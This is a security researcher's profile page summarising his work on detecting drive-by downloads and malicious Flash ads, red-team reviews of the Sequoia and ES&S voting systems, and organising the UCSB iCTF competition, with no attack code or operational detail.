Marco Cova

Attacks against web clients (i.e., browsers and their plugins) have become prevalent. Two types of particularly insidious attacks are drive-by downloads, which launch exploits against vulnerable browsers to infect the compromised machines with malware (which, often, in turn, convert the machines into bots), and Flash-based malvertisements, which are malicious advertisements designed to exploit vulnerabilities in Flash players or to redirect an unsuspecting victim to a questionable web site.

I led the design and development of Jsand, a tool that detects web pages and PDF files that launch drive-by-download attacks, and was involved in the design and development of OdoSwiff, a tool that detects malicious advertisement written in Flash. Both tools are publicly available on Wepawet, our online service for the analysis of web-based malware.

I was a member of the UCSB Security Group that completed an analysis of the Sequoia electronic voting system as part of a Top-to-Bottom Review of the electronic voting systems used in California. The study was commissioned by California Secretary of State Debra Bowen. As a result of the review, the Secretary of State decertified the current systems and recertified them on condition of use of stricter procedures and security measures.

We acted as a "Red Team" and performed a series of security tests of both the hardware and the software that are part of the Sequoia system to identify possible security problems that could lead to a compromise.

We were able to expose a number of serious security issues. We were able to bypass both the physical and the software security protections of the Sequoia system, and we demonstrated how these vulnerabilities could be exploited by a determined attacker to modify (or invalidate) the results of an election.

I was a member of the WebWise Security team that completed an analysis of the ES&S electronic voting system as part of the EVEREST project. The study was commissioned by Ohio Secretary of State Jennifer Brunner, who issued a series of recommendations and options to address the study's findings.

Our testing consisted of a "red teaming" assessment of the security of the hardware and software that are part of the ES&S system. We were able to identify a number of serious vulnerabilities, and showed how they could be exploited to compromise the integrity of an election by developing a number of attacks. We also demonstrated how a virus could be created to infect and control electronic voting machines.

For several years, I've been one of the people involved in the organization of the UCSB International Capture The Flag competition (iCTF). The iCTF is a distributed, wide-area security exercise, whose goal is to test the security skills of the participants from both the attack and defense viewpoints.

During the iCTF, a number of teams compete independently against each other. We provide each team with an indentical copy of a virtualized network installation (for example, a Linux host). The host includes a number of programs and network services, which we developed and in which we intentionally introduced a number of vulnerabilities. The task of each team, then, is to find the vulnerabilities, fix them without disrupting the normal operations of the programs, and leverage their knowledge about the vulnerabilities to compromise the servers run by other teams.